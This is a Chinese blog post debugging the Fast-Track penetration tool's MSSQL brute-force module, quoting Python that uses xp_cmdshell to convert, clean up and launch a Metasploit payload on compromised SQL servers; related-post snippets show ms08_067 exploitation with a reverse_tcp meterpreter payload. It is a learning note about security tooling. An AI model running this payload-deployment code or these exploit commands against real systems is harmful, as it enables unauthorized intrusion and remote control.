(a)ttempt SQL Ping and Auto Quick Brute Force 续2——原因

最新推荐文章于 2021-11-19 20:52:41 发布
最新推荐文章于 2021-11-19 20:52:41 发布
阅读量873 收藏
点赞数
分类专栏: mssqlserver2000 SQL Injection metasploit backtrack python fasttrack
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feier7501/article/details/9295545
版权

今晚再次调试,发现生成的h2b.exe无法运行,这个文件用来把hex转换成bin,而且后面的代码,似乎也有问题:

       print "Metasploit payload delivered.."
       print "Converting our payload to binary, this may take a few..."
       query5=("""xp_cmdshell 'h2b metasploit%s'""" % (randomgen))
       printquery=mssql.execute_query(query5)
       print "Cleaning up..."
       query5=("""xp_cmdshell 'del metasploit%s'""" % (randomgen))
       printquery=mssql.execute_query(query5)
       query5=("""xp_cmdshell 'del h2b.exe'""")
       printquery=mssql.execute_query(query5)
       print "Launching payload, this could take up to a minute..."
       print "When finished, close the metasploit handler window to return to other compromised SQL Servers."
       query5=("""xp_cmdshell 'metasploit%s'""" % (randomgen))
       printquery=mssql.execute_query(query5)
       pause=raw_input("Press enter to return back to compromised SQL Servers.")

既然已经删除metasploit,为什么还要运行:

query5=("""xp_cmdshell 'metasploit%s'""" % (randomgen))

我觉得应该去掉: 
query5=("""xp_cmdshell 'del metasploit%s'""" % (randomgen))

初始化的时候再去删除。





feier7501
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bruteForce:暴力破解各种服务的工具
04-13
蛮力 ━━┓━━━━━━━━━━━━━━━━━━━━━━━━┓━━━━━━━━━━━━━━ ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ ━━┓━━━━━┃┗━━┓┏━━┓┏━...
(a)ttempt SQL Ping and Auto Quick Brute Force(未完待
天元喜羊羊的博客
07-08 1087
在BT5R3上,需要修改文件/pentest/exploits/fasttrack/config/fasttrack_config,改为: METASPLOIT_PATH=/opt/metasploit/app/ 否则会找不到msfcli。 然后进入fasttrack进行操作: root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i
DVWA通关详解
weixin_45808483的博客
11-19 3508
Vulnerability: Brute Force Security level is currently: low. 分析源码: 没有做身份验证 <?php //检查变量是否设置(先看有没有Login参数) if( isset( $_GET[ 'Login' ] ) ) { //获取密码,存入pass变量中 $user = $_GET[ 'username' ]; //获取密码 $pass = $_GET[ 'password' ]; //将密码使用md5加密 $
[转]Windows Notes And Cheatsheet
Shad0wpf的博客
12-12 1056
Table of Contents: 文章目录File TransferTFTPFTPVBS ScriptPowershellPowershell Base64Secure Copy / pscp.exeBitsAdmin.exeRemote DesktopWinHTTP Com ObjectCertUtilCurl (Windows 1803+)SMBEnumerationBasicsUsers...
2017-2018-2 20155314《网络对抗技术》Exp6 信息搜集与漏洞扫描
axhc_chentao1981的博客
05-09 433
2017-2018-2 20155314《网络对抗技术》Exp6 信息搜集与漏洞扫描 目录 实验目标 实验内容 实验环境 基础问题回答 预备知识 实验步骤 1 信息搜集 1.1 外围信息搜集 1.1.1 通过DNS和IP挖掘目标网站的信息 1.1.2 通过搜索引擎进行信息搜集 1.2 主机探测和端口扫描——基于Armitage自动化实现 1.2.1 活跃主机扫描和操作系统辨...
【Web安全笔记】之【9.0 工具与资源】
AA8j的博客
12-23 3040
9.0 工具与资源 9.1 推荐资源 9.1.1 书单 1. 前端 Web之困 白帽子讲Web安全 白帽子讲浏览器安全(钱文祥) Web前端黑客技术揭秘 XSS跨站脚本攻击剖析与防御 SQL注入攻击与防御 2. 网络 Understanding linux network internals TCP/IP Architecture, Design, and Implementation in Linux Linux Kernel Networking: Implementation and Theor
backtrack工具列表及介绍
积木网络
01-07 1万+
积木网络 Tools 1 Tools Found on BackTrack 3.0 Final (This wiki is still being updated for the latest release) 1.1 Information Gathering 1.1.1 0trace 0.01 1.1.2 Ass 1.1.3 dig 1.1.4 DMitry 1.1.5 DNS
Brute-force-algorithm.rar_Brute Force Search_brute force_brutef
09-20
穷举算法,VC中的经典程序之一,适合初学者,
bruteforce-http-auth:Bruteforce HTTP身份验证
02-03
Bruteforce HTTP身份验证 警告 /!\未经过充分测试/!\ 描述 暴力破解HTTP认证表单的简单工具。 支持: 基本HTTP验证 摘要式HTTP验证 NTLM身份验证 用法 用法示例: python3 bruteforce-...
bruteforce-database_passwords_cracking_bruteforce_
10-02
Bruteforce database passwords list wordlists
Java数据结构及算法实例:朴素字符匹配 Brute Force
09-03
朴素字符匹配,也称为Brute Force算法,是一种基础的字符串搜索方法。它的基本思想是对每一对主串(待查找的字符串)和模式串(要匹配的子串)进行逐字符的比较,直到找到匹配的子串或者遍历完所有可能的起始位置。...
metasploit的session操作
热门推荐
天元喜羊羊的博客
04-25 1万+
msf > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- -
metasploit运行run vnc
天元喜羊羊的博客
04-27 1万+
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.1.142 RHOST => 192.168.1.142 msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
metasploit使用辅助模块
天元喜羊羊的博客
05-15 1万+
显示所有的辅助模块: msf > show auxiliary Auxiliary ========= Name Disclosure Date Rank Description ----
metasploit将命令行shell升级为meterpreter
天元喜羊羊的博客
04-28 8035
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > set
please give me a splunk securlty event rule about internet bruteforce detect
最新发布
07-14
Here's an example of a Splunk security event rule for detecting internet brute-force attacks: ``` index=your_index sourcetype=your_sourcetype source=your_source | rex field=_raw "Failed login for ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值